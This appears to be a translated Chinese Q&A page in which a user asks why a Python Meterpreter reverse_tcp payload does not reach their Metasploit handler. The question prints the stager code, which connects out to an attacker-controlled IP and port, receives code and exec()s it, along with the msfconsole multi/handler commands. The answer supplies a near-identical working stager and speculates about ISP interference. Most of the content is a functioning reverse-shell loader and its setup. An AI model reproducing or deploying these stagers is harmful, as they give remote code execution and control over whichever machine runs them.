Meterpreter没有连接 - Python

时间:2016-03-05 18:48:08

标签: python exploit payload metasploit

我使用import socket,struct s=socket.socket(2,socket.SOCK_STREAM) s.connect(('MY PUBLIC IP',3930)) l=struct.unpack('>I',s.recv(4))[0] d=s.recv(l) while len(d)<l: d+=s.recv(l-len(d)) exec(d,{'s':s}) 创建了以下python有效负载:

msfconsole

然后我打开了use exploit/multi/handler set payload python/meterpreter/reverse_tcp set LHOST 192.168.0.186 (MY LOCAL IP) set LPORT 3930 exploit ,并完成了以下操作:

{{1}}

它在192.168.0.186:3930上开始反向TCP处理程序,并且还启动有效负载处理程序。但是,当我在另一台计算机上运行脚本时,有效负载在等待大约一分钟后超时,并且msfconsole没有注册任何内容。我在路由器上转发了3930端口。我在这里做错了什么?

1 个答案:

答案 0 :(得分:0)

这是我在Unix系统上用于反向TCP的代码,其中包含您提供的详细信息。但是,我在错误搜索后偶然发现了你的帖子,所以这不是100%无瑕疵。我已经让它在过去完美地工作,但就在最近它开始滞后。它会在内部系统上运行一次,但之后的任何内容都会给我带来相同的错误信息。通过WAN进行此操作时,我也会收到相同的消息,而不是LAN,但是第一次没有运行。你有什么ISP?它可能完全取决于此。

import socket,struct
s=socket.socket(2,1)
s.connect(('IP ADDRESS',3930))
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(4096)
while len(d)!=l:
    d+=s.recv(4096)
exec(d,{'s':s})